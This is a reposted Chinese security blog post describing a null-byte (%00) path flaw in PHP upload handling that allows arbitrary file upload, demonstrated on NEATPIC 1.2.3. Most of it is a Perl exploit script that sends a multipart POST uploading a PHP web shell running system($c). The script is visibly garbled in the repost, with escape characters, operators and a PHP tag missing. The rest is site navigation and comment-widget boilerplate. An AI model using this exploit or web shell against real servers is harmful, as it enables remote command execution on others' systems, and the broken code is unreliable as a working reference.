PHP网站警报,多种PHP程序过滤漏洞(转)

PHP网站警报,多种PHP程序过滤漏洞(转)[@more@]

  危害:直接上传任意文件

  漏洞描述:

  当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.

  测试程序:NEATPIC PHP目录直读版 1.2.3

  http://web.cncode.com/SoftView.asp?SoftID=1820

  此文档参与者:

  漏洞实验者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members]

  Http://Www.Bugkidz.org

  Xiaolu提供了一个漏洞利用程序:

  #!/usr/bin/perl

  $

  = 1;

  use Socket;

  $host = "127.0.0.1";

  $port = "80";

  $UploadTo = "";

  $str =

  "-----------------------------7d41f4a600472 ".

  "Content-Disposition: form-data; name="path" ".

  " ".

  "./php.php%00 ".

  "-----------------------------7d41f4a600472 ".

  "Content-Disposition: form-data; name="image"; filename=

  "F: ools1.gif" ".

  "Content-Type: text/plain ".

  " ".

  ""system($c); ".

  "?> ".

  "-----------------------------7d41f4a600472-- ".

  " ";

  print $str;

  $len=length($str);

  print $len;

  $req ="POST /index.php?action=upload HTTP/1.1 ".

  "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

  application/msword, application/x-shockwave-flash, */* ".

  "Referer: http://127.0.0.1/index.php?path=. ".

  "Accept-Language: zh-cn ".

  "Content-Type: multipart/form-data; boundary=----------------

  -----------7d41f4a600472 ".

  "Accept-Encoding: gzip, deflate ".

  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT

  5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) ".

  "Host: 127.0.0.1 ".

  "Content-Length: $len ".

  "Connection: Keep-Alive ".

  "Cache-Control: no-cache ".

  "Cookie: PHPSESSID=111111111111111111111111 ".

  " ".

  "$str ";

  print $req;

  @res = sendraw($req);

  print @res;

  #Hmm...Maybe you can send it by other way

  sub sendraw {

  my ($req) = @_;

  my $target;

  $target = inet_aton($host)

  die("inet_aton problems ");

  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')

  0)

  die("Socket problems ");

  if(connect(S,pack "SnA4x8",2,$port,$target)){

  select(S);

  $

  = 1;

  print $req;

  my @res = ;

  select(STDOUT);

  close(S);

  return @res;

  }

  else {

  die("Can't connect... ");

  }

  }

  

本文来自:http://www.linuxpk.com/30642.html

--&gtlinux电子图书免费下载和技术讨论基地

·上一篇: 取得龙客联盟的文章管理系统的权限攻击

·下一篇: 深入了解MicrosoftAccess安全性
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970190/,如需转载,请注明出处,否则将追究法律责任。

user_pic_default.png
请登录后发表评论 登录
全部评论
<%=items[i].createtime%>

<%=items[i].content%>

<%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%=items[i].items.items[j].createtime%> 回复

<%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%><%=items[i].items.items[j].content%>

<%}%> <%if(items[i].items.total > 5) { %>
还有<%=items[i].items.total-5%>条评论 ) data-count=1 data-flag=true>点击查看
<%}%>
<%}%> <%}%>

转载于:http://blog.itpub.net/10763080/viewspace-970190/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值